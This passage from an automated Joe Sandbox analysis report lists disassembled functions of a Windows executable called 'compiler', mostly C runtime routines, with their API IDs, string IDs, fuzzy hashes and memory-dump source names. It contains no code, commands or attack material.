                                                            • GetModuleHandleA.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57C82
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57C93
                                                            • GetModuleHandleExA.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57CB0
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57CC2
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID:
                                                            • API String ID: 667068680-0
                                                            • Opcode ID: 218c4462ff4f5f4f61d90a0ddfa3851b511cca9bfdc4549e6f0db9f50f612a47
                                                            • Instruction ID: 9dff5d65606a6aa03af7a9dcbc56b3b3f6c7c91186a4d1c9646baf17f3634581
                                                            • Opcode Fuzzy Hash: 218c4462ff4f5f4f61d90a0ddfa3851b511cca9bfdc4549e6f0db9f50f612a47
                                                            • Instruction Fuzzy Hash: A5F0A460609A4291FE44BB59E544279E360FF5ABC0BD80878DF1E0675CEF2CD014C3A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBBDE0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: 016bd4abb82d9b53c550d9874fae25368a291ec228e867b8fc9ac5df5330fa95
                                                            • Instruction ID: 3aae1f200cd0449d878df00917b5e68644ae4eaa25a62432d8f970ea272bd4dd
                                                            • Opcode Fuzzy Hash: 016bd4abb82d9b53c550d9874fae25368a291ec228e867b8fc9ac5df5330fa95
                                                            • Instruction Fuzzy Hash: 1981C232D0C302A9F7657E2C8750338EA90EF3B744FD452B5EF4D8219CDA2EA8419B21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD94B5C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 00d4f6fbcc0b86b5737d05fbe3e8c8b52d55eb691c94426ea1fd48ac158370db
                                                            • Instruction ID: a15a1bbf6b3b74aa8d27ecef22f08f4657390e1b1a374e48d44b9c4810534a69
                                                            • Opcode Fuzzy Hash: 00d4f6fbcc0b86b5737d05fbe3e8c8b52d55eb691c94426ea1fd48ac158370db
                                                            • Instruction Fuzzy Hash: 5B818DB690824286FB64BF2D80449BDB7A0EB23F58F9401B5CF4D4629EDE39E481C775
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD943B4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 7989a09cc460249dc64a8cc5481ffcab55902b17f0bef9661494f5c7cd2f6134
                                                            • Instruction ID: f7acbbb5e6e24f587a9b60ee789478bdac77d397da564e975858d1a96201d301
                                                            • Opcode Fuzzy Hash: 7989a09cc460249dc64a8cc5481ffcab55902b17f0bef9661494f5c7cd2f6134
                                                            • Instruction Fuzzy Hash: 5A8181F280825285FBA4BF2D80549BDB7A0EB23B58FD401B5DF594629EDE39E441CB34
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD935C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 6f48534bd8d2da33e8a64d5d4553e022d1d8de24cca7944cf78ce6d89aac79ee
                                                            • Instruction ID: 24b0296cea7e49f9e6cecc63c8f4ee6ce324bcae2cc57e087c693b626cd87fde
                                                            • Opcode Fuzzy Hash: 6f48534bd8d2da33e8a64d5d4553e022d1d8de24cca7944cf78ce6d89aac79ee
                                                            • Instruction Fuzzy Hash: A481617690C28286FB64BE2D40445BCFBA1EBA7B48F9401BDCF494639DCE39E445CB21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD93C98 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 487deaacb9114b386305e53eb4ecc5f992b2020c04d1230510f6bf9bb921c12c
                                                            • Instruction ID: 449c542847401afb301b42683cdff1d8e1b95f63bcfd6d0946e1a98892fbdfd5
                                                            • Opcode Fuzzy Hash: 487deaacb9114b386305e53eb4ecc5f992b2020c04d1230510f6bf9bb921c12c
                                                            • Instruction Fuzzy Hash: 6C81607690C64286F764BF2D804457CBBA0EBA7B08F9402B9DF494629DCF39E441CB35
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADAE440 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: "$sinh
                                                            • API String ID: 1156100317-1232919748
                                                            • Opcode ID: 1b7f2a28658e851d18b3e1d344bf4723efcb843dfa7aff974d4ddff1f88f913e
                                                            • Instruction ID: ffca4cc118c58a6c7ba64352341c102d13a80a9c9814fc9db89c432753e9cb5c
                                                            • Opcode Fuzzy Hash: 1b7f2a28658e851d18b3e1d344bf4723efcb843dfa7aff974d4ddff1f88f913e
                                                            • Instruction Fuzzy Hash: E6919421E18F8188E263AB38A441376B358EF77395F519377EA8E35A5DDF2CA1438710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD93398 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 156COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 8f68f425e7cb7e31de09a4e8309823c8fce73fa23a67521ed41888ec4eb7866a
                                                            • Instruction ID: 75b94bf5f780719b41c532e0202b7e982e103c0cedc8be23b5710a893ddbb7ed
                                                            • Opcode Fuzzy Hash: 8f68f425e7cb7e31de09a4e8309823c8fce73fa23a67521ed41888ec4eb7866a
                                                            • Instruction Fuzzy Hash: FD61557290C24186F7A9BE2C805877DB7A1EBABB19FD511BDCF4A0219DCF28D845C621
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD93868 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 5923f8ead6b8f065035d94a0e2b87c190eb5860a57fedfb4d9006a879b2eb152
                                                            • Instruction ID: 35663792eb19e1ab754cf1ba68a6fe21a28fb7ce19f8d58fadddcdd3a3f863bc
                                                            • Opcode Fuzzy Hash: 5923f8ead6b8f065035d94a0e2b87c190eb5860a57fedfb4d9006a879b2eb152
                                                            • Instruction Fuzzy Hash: 2561757290C2428AF764BE2D8059BBCB7A1EBA7B18F9411BDCF4A4129DCF38D545C721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD93F30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 2da02ced6c2e1e19490a68693a05258c61f8e5acf6284ee305ebd8c9268361d2
                                                            • Instruction ID: 49206168c80d69fc7193b847506a260c9c6611375f7e1088b05ee88a51d00ead
                                                            • Opcode Fuzzy Hash: 2da02ced6c2e1e19490a68693a05258c61f8e5acf6284ee305ebd8c9268361d2
                                                            • Instruction Fuzzy Hash: 586161B290C64286F764BE2C815877DBBA1EB67B49F9411B5CF4E422DECF39D481C620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADADF84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$acos
                                                            • API String ID: 1156100317-2870037509
                                                            • Opcode ID: f2aea4717332eacf9599787777cac4930881c66dd4f74aac74544474ac18fe70
                                                            • Instruction ID: 36809019a83763a508fc1e18a7f386070affdb92b6430c29e74c98cb262d5834
                                                            • Opcode Fuzzy Hash: f2aea4717332eacf9599787777cac4930881c66dd4f74aac74544474ac18fe70
                                                            • Instruction Fuzzy Hash: 14619421D18F4589F523BB3CA45027AD654FFB7390F918376EF9E65A6CDF2CA0428610
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB9854 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$e+000$gfff
                                                            • API String ID: 3215553584-2620144452
                                                            • Opcode ID: 6e4bf075dfa41e29566810b74a862345e101606eff1e5674b8854fa803e6ed6f
                                                            • Instruction ID: c1f1cef7be4dc9029d6fefed294bbac49123699c9237a876ec1221164f7b296a
                                                            • Opcode Fuzzy Hash: 6e4bf075dfa41e29566810b74a862345e101606eff1e5674b8854fa803e6ed6f
                                                            • Instruction Fuzzy Hash: EF512762B183C55AFB61AB3D944036DABA1E762B90FC89271DB9847BDECF2CD044C710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADADCF8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$asin
                                                            • API String ID: 1156100317-2188059690
                                                            • Opcode ID: c8cb0a8993d4168913ef16ae3364b060e8f93b962bf75556cc6919c2332f8f9f
                                                            • Instruction ID: 7459ec1b73b5c0df9897f51495aa6c83eb4ec2d1b7aac2ab4e8fffb4d687a1dd
                                                            • Opcode Fuzzy Hash: c8cb0a8993d4168913ef16ae3364b060e8f93b962bf75556cc6919c2332f8f9f
                                                            • Instruction Fuzzy Hash: 98515121D28F8585F613BB3C985037AD654EFB7390F918376EF9A75A6CDF2CA0824610
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD8F4EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: 68d6d60a81ec988a2ee50aff0fa4c758ac0cd894e8c1203106ca8e284750cb42
                                                            • Instruction ID: 0b135a7539a475520b37f01d44c2db8be8c1eb63e7ffe14c8ea74112f78c234e
                                                            • Opcode Fuzzy Hash: 68d6d60a81ec988a2ee50aff0fa4c758ac0cd894e8c1203106ca8e284750cb42
                                                            • Instruction Fuzzy Hash: D621273660864186E630BF19E04466EB760FB9AB61F800275DF8D0379DCF3CE886CB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC0054 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$_get_daylight
                                                            • String ID:
                                                            • API String ID: 72036449-0
                                                            • Opcode ID: f4e6ab5acb3b199fd560212d424b1a072a9b0cc689206b4aa84e1670fe172725
                                                            • Instruction ID: 3cc537a11fd60d975ef1d6666e1133d91d3d60005ae31c71086a242620edb8d1
                                                            • Opcode Fuzzy Hash: f4e6ab5acb3b199fd560212d424b1a072a9b0cc689206b4aa84e1670fe172725
                                                            • Instruction Fuzzy Hash: 0751C232D0C24266F7697A2CC404379E681EB62714FD949B5DF4E872DEEE2CE84096E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3C3C8 Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3461063567-0
                                                            • Opcode ID: d7379f8e256efc8a75f31393473afb83f56ea896de2bdf121ec60c2110ebeb92
                                                            • Instruction ID: a0be0d7b65b579fe7f3cf753f345ac28539769a3612c9bb436bb13aa7867ae56
                                                            • Opcode Fuzzy Hash: d7379f8e256efc8a75f31393473afb83f56ea896de2bdf121ec60c2110ebeb92
                                                            • Instruction Fuzzy Hash: 55216B32604B8196EB24AF15E4403E9B3A1FB99784F840076EF4D4375CDF38E658C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBEF18 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                            • String ID:
                                                            • API String ID: 2321548817-0
                                                            • Opcode ID: 466fbf66acd44921e52936077224c3abc88eaf7d53186d7a0c54b09487fead34
                                                            • Instruction ID: c34542a284c3bac8fbcca41ac4eb61545036b2c4c0c06e30ebedd5acba8cbfdc
                                                            • Opcode Fuzzy Hash: 466fbf66acd44921e52936077224c3abc88eaf7d53186d7a0c54b09487fead34
                                                            • Instruction Fuzzy Hash: 2C118E61A0874192FB14BF2D940027CE6A1EFAABA0FD44674EF29476CDDF2CD4118721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD948D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 2947e2b11e05ee4143448a0bf40de8105c14be163486140bbdcd5b1e60f2cb2f
                                                            • Instruction ID: f81cde13589a14c6d394ddcfa97d4c980732261106b8cc4eb5a9b11ca324326f
                                                            • Opcode Fuzzy Hash: 2947e2b11e05ee4143448a0bf40de8105c14be163486140bbdcd5b1e60f2cb2f
                                                            • Instruction Fuzzy Hash: 4E7184B290865286F768BF2C805457CBBB0EB26B5CF9441B9DF4E0229EDF78D581C724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD9413C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
